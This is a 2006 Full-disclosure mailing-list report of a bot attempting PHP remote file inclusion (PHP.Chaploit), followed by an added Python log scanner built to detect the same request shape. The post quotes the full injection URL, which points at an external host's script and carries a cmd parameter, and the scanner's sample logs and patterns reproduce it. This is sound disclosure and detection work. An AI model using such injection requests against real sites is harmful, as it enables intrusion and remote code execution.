[Full-disclosure] Sidewinder Command/Safemode Exploit 4.1 (PHP.Chaploit)
- To: "General DShield Discussion List" <list@xxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Sidewinder Command/Safemode Exploit 4.1 (PHP.Chaploit)
- From: "Maxime Ducharme" <mducharme@xxxxxxxxxxxxxxxxxxx>
- Date: Mon, 9 Jan 2006 12:00:02 -0500
Hello
we got hit by what looks like a bot
trying to inject PHP.Chaploit in our sites
Host is in 202.226.224.*
User-Agent : lwp-trivial/1.35
the bot hit one of our dynamic pages (ASP)
trying to inject the PHP script located on
http://www.foxcf.hpgvip.com.br/cse.gif
Full URL was
ourpage.asp?ID=ID=http://www.foxcf.hpgvip.com.br/cse.gif?&cmd=cat%20bugado
obviously trying to inject PHP in ASP isn't a good idea,
that's what makes me think this is an automated (and dumb) attack
VirusTotal says:
AntiVir    6.33.0.75  01.09.2006  Linux/Rootkit
Avast      4.6.695.0  01.09.2006  PHP:Chaploit
Avira      6.33.0.75  01.09.2006  Linux/Rootkit
DrWeb      4.33       01.09.2006  PHP.Chaploit
Kaspersky  4.0.2.24   01.09.2006  Exploit.PHP.e
McAfee     4669       01.06.2006  PHP/Chaploit
(others didn't detect anything)
I also advised the sysadmin of the web server hosting this
file.
I just wanted to share this information with the community
have a nice day
Maxime Ducharme
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
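
Added example (not part of the original post): a Python check for the request shape reported in the message above, a query parameter whose value is an absolute URL, optionally with a cmd parameter and the lwp-trivial User-Agent. The log lines, addresses and host names are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (combined log format is assumed; addresses and
# host names are placeholders, not values from the original post).
SAMPLE_LOG = '''\
192.0.2.10 - - [09/Jan/2006:11:58:01 -0500] "GET /ourpage.asp?ID=ID=http://remote.example.invalid/cse.gif?&cmd=cat%20bugado HTTP/1.0" 200 512 "-" "lwp-trivial/1.35"
198.51.100.7 - - [09/Jan/2006:11:58:04 -0500] "GET /ourpage.asp?ID=42 HTTP/1.1" 200 2048 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.9 - - [09/Jan/2006:11:59:10 -0500] "GET /go.asp?next=%68ttp%3A%2F%2Fremote.example.invalid%2Fx.txt%3F HTTP/1.1" 404 0 "-" "Mozilla/4.0"
'''

# Captures: client address, request target, User-Agent.
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
REMOTE_URL_RE = re.compile(r"=(?:https?|ftp)://", re.I)   # value is an absolute URL
CMD_PARAM_RE = re.compile(r"(?:^|[?&])cmd=", re.I)        # command parameter for the included script
SCRIPTED_UA_RE = re.compile(r"^lwp-trivial", re.I)        # User-Agent named in the post


def classify(line):
    """Return (source, target, reasons) for a log line, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, target, ua = m.groups()
    query = unquote(target.partition("?")[2])  # decode forms like %68ttp%3A%2F%2F
    reasons = []
    if REMOTE_URL_RE.search(query):
        reasons.append("remote-url-in-param")
    if CMD_PARAM_RE.search(query):
        reasons.append("cmd-param")
    if SCRIPTED_UA_RE.match(ua):
        reasons.append("scripted-ua")
    return src, target, reasons


def scan(log_text):
    """Report only requests that carry a remote URL as a parameter value."""
    hits = []
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and "remote-url-in-param" in parsed[2]:
            hits.append(parsed)
    return hits


if __name__ == "__main__":
    for src, target, reasons in scan(SAMPLE_LOG):
        print(src, ",".join(reasons), target)
```

Parameters that legitimately carry URLs, such as redirect targets, will also match the first rule, so pair it with an allow-list of expected parameter names before alerting on it.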